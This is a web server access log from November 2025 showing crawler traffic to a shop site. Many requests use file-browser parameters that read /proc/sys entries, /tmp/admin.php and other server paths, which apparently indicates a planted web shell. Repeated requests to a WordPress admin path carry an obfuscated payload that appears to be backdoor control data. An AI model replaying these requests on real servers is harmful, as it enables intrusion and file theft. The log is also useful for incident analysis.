74.7.227.128 - - [05/Nov/2025:21:01:10 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/core/busy_poll&path=//proc/sys/net/core HTTP/2" 200 2501 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:20:59:14 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335343735342p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335313135342q6136323064666433313962333262643839366633313234616431623836636661222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:01:17 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/tcp_max_orphans&path=//proc/sys/net/ipv4 HTTP/2" 200 2511 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:01:22 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/ip_no_pmtu_disc&path=//proc/sys/net/ipv4 HTTP/2" 200 2505 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:01:26 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/tcp_adv_win_scale&path=//proc/sys/net/ipv4 HTTP/2" 200 2507 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:01:32 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/tcp_low_latency&path=//proc/sys/net/ipv4 HTTP/2" 200 2504 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:01:37 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/icmp_msgs_per_sec&path=//proc/sys/net/ipv4 HTTP/2" 200 2512 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:20:59:36 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335343737362p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335313137362q6236393165303966653262353733393839336661343064356531373739663833222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:01:43 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/tcp_thin_dupack&path=//proc/sys/net/ipv4 HTTP/2" 200 2505 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:01:48 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/ip_default_ttl&path=//proc/sys/net/ipv4 HTTP/2" 200 2505 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:01:53 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/icmp_echo_ignore_all&path=//proc/sys/net/ipv4 HTTP/2" 200 2511 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.71.3 - - [05/Nov/2025:21:01:53 +0700] "GET /shopbrand541898891?kg=0540718742 HTTP/1.1" 200 26801 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.7.226.137 - - [05/Nov/2025:20:59:59 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335343739392p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335313139392q6134396533313166653432653861383934316230386538373438353738643232222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:02:01 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/tcp_fin_timeout&path=//proc/sys/net/ipv4 HTTP/2" 200 2505 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:02:05 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/tcp_min_tso_segs&path=//proc/sys/net/ipv4 HTTP/2" 200 2506 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:02:08 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv6/xfrm6_gc_thresh&path=//proc/sys/net/ipv6 HTTP/2" 200 2509 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:02:13 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/xfrm4_gc_thresh&path=//proc/sys/net/ipv4 HTTP/2" 200 2508 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:02:17 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv6/mld_qrv&path=//proc/sys/net/ipv6 HTTP/2" 200 2502 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:21:00:21 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335343832312p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335313232312q3763353466393537643362626161393635323065636262356363333735663530222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:02:21 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/tcp_min_snd_mss&path=//proc/sys/net/ipv4 HTTP/2" 200 2507 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:02:25 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/core/netdev_tstamp_prequeue&path=//proc/sys/net/core HTTP/2" 200 2510 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:02:30 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/core/default_qdisc&path=//proc/sys/net/core HTTP/2" 200 2509 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:02:34 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/core/netdev_budget&path=//proc/sys/net/core HTTP/2" 200 2504 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:02:40 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/core/rmem_default&path=//proc/sys/net/core HTTP/2" 200 2505 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:21:00:44 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335343834342p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335313234342q6431663362643862626665383330643336353131616666396335343764386432222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:02:48 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/core/message_burst&path=//proc/sys/net/core HTTP/2" 200 2501 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:02:54 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/core/wmem_default&path=//proc/sys/net/core HTTP/2" 200 2508 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.71.3 - - [05/Nov/2025:21:02:55 +0700] "GET /shopbrand38362946?kg=0038279826 HTTP/1.1" 200 25096 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.128 - - [05/Nov/2025:21:02:57 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/core/rps_sock_flow_entries&path=//proc/sys/net/core HTTP/2" 200 2508 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:03:03 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/core/xfrm_acq_expires&path=//proc/sys/net/core HTTP/2" 200 2505 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:21:01:07 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335343836372p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335313236372q3237326164316565616565383361373265663061306634386137343337313632222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:03:07 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/core/xfrm_aevent_etime&path=//proc/sys/net/core HTTP/2" 200 2507 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:03:10 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/core/xfrm_aevent_rseqth&path=//proc/sys/net/core HTTP/2" 200 2508 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:03:13 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/core/xfrm_larval_drop&path=//proc/sys/net/core HTTP/2" 200 2504 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.73.71 - - [05/Nov/2025:21:03:16 +0700] "GET /shopbrand561700330?kg=0560477042 HTTP/1.1" 200 27544 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.128 - - [05/Nov/2025:21:03:19 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/icmp_echo_ignore_broadcasts&path=//proc/sys/net/ipv4 HTTP/2" 200 2511 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:03:23 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/tcp_thin_linear_timeouts&path=//proc/sys/net/ipv4 HTTP/2" 200 2512 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:21:01:30 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335343839302p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335313239302q3833363734343265383832613530393464316462386435343934643933386663222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:03:33 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/tcp_allowed_congestion_control&path=//proc/sys/net/ipv4 HTTP/2" 200 2524 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:03:38 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv6/ip6frag_secret_interval&path=//proc/sys/net/ipv6 HTTP/2" 200 2511 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:03:43 +0700] "GET /shopbrand557880000?path=//run/cagefs HTTP/2" 200 2792 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
57.141.14.9 - - [05/Nov/2025:21:03:46 +0700] "GET /shopbrand1137439325?kg=1134961702 HTTP/2" 200 62523 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.14.65 - - [05/Nov/2025:21:03:47 +0700] "GET /shopbrand1137432954?kg=1134955346 HTTP/2" 200 62523 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.14.98 - - [05/Nov/2025:21:03:48 +0700] "GET /shopbrand1137386065?kg=1134908558 HTTP/2" 200 62523 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
74.7.227.128 - - [05/Nov/2025:21:03:49 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/core/bpf_jit_enable&path=//proc/sys/net/core HTTP/2" 200 2503 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
57.141.14.63 - - [05/Nov/2025:21:03:52 +0700] "GET /shopbrand1137367593?kg=1134890126 HTTP/2" 200 62523 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
74.7.227.128 - - [05/Nov/2025:21:03:53 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/tcp_stdurg&path=//proc/sys/net/ipv4 HTTP/2" 200 2501 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
57.141.14.9 - - [05/Nov/2025:21:03:53 +0700] "GET /shopbrand1137318328?kg=1134840970 HTTP/2" 200 62523 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
103.7.226.137 - - [05/Nov/2025:21:01:53 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335343931332p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335313331332q6338643634356139306563316332393465386665356134306234376437643061222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:03:56 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/icmp_ignore_bogus_error_responses&path=//proc/sys/net/ipv4 HTTP/2" 200 2519 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:03:59 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/core/netdev_rss_key&path=//proc/sys/net/core HTTP/2" 200 2610 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:04:03 +0700] "GET /shopbrand557777056?path=//lib/gcc/x86_64-redhat-linux/4.8.5 HTTP/2" 200 3675 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:04:09 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv6/fwmark_reflect&path=//proc/sys/net/ipv6 HTTP/2" 200 2504 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:04:12 +0700] "GET /shopbrand558005581?fileloc=//tmp/admin.php&path=//tmp HTTP/2" 200 6409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
57.141.14.97 - - [05/Nov/2025:21:04:14 +0700] "GET /shopbrand1137269073?kg=1134791822 HTTP/2" 200 62523 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
57.141.14.90 - - [05/Nov/2025:21:04:15 +0700] "GET /shopbrand1137584702?kg=1135106762 HTTP/2" 200 62523 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
103.7.226.137 - - [05/Nov/2025:21:02:16 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335343933362p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335313333362q3332373162333931383533656361663532663366343964666137326436336636222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:04:18 +0700] "GET /shopbrand557700003?path=//run/cagefs HTTP/2" 200 2792 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:04:24 +0700] "GET /shopbrand557777661?path=//run/cagefs HTTP/2" 200 2792 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:04:27 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/tcp_max_tw_buckets&path=//proc/sys/net/ipv4 HTTP/2" 200 2513 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:04:30 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/ipfrag_max_dist&path=//proc/sys/net/ipv4 HTTP/2" 200 2505 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:04:33 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/ip_forward_use_pmtu&path=//proc/sys/net/ipv4 HTTP/2" 200 2509 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:21:02:38 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335343935382p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335313335382q3463613131346232303837613831313532393739373130363134626137613864222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:04:39 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/fwmark_reflect&path=//proc/sys/net/ipv4 HTTP/2" 200 2504 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:04:43 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/tcp_window_scaling&path=//proc/sys/net/ipv4 HTTP/2" 200 2506 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:04:49 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/ip_early_demux&path=//proc/sys/net/ipv4 HTTP/2" 200 2505 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:04:53 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/tcp_max_syn_backlog&path=//proc/sys/net/ipv4 HTTP/2" 200 2513 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:04:56 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/core/dev_weight&path=//proc/sys/net/core HTTP/2" 200 2504 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:21:03:00 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335343938302p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335313338302q3034356432343565373130393365363362366134396463303563666134303861222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:05:02 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_conntrack_count&path=//proc/sys/net/netfilter HTTP/2" 200 2517 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:05:06 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/icmp_msgs_burst&path=//proc/sys/net/ipv4 HTTP/2" 200 2506 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:05:09 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/tcp_workaround_signed_windows&path=//proc/sys/net/ipv4 HTTP/2" 200 2512 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:05:15 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/icmp_errors_use_inbound_ifaddr&path=//proc/sys/net/ipv4 HTTP/2" 200 2519 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
40.77.167.9 - - [05/Nov/2025:21:05:15 +0700] "GET /shopbrand1239920712?kg=1237219818 HTTP/2" 200 24947 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.227.128 - - [05/Nov/2025:21:05:19 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/tcp_challenge_ack_limit&path=//proc/sys/net/ipv4 HTTP/2" 200 2511 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
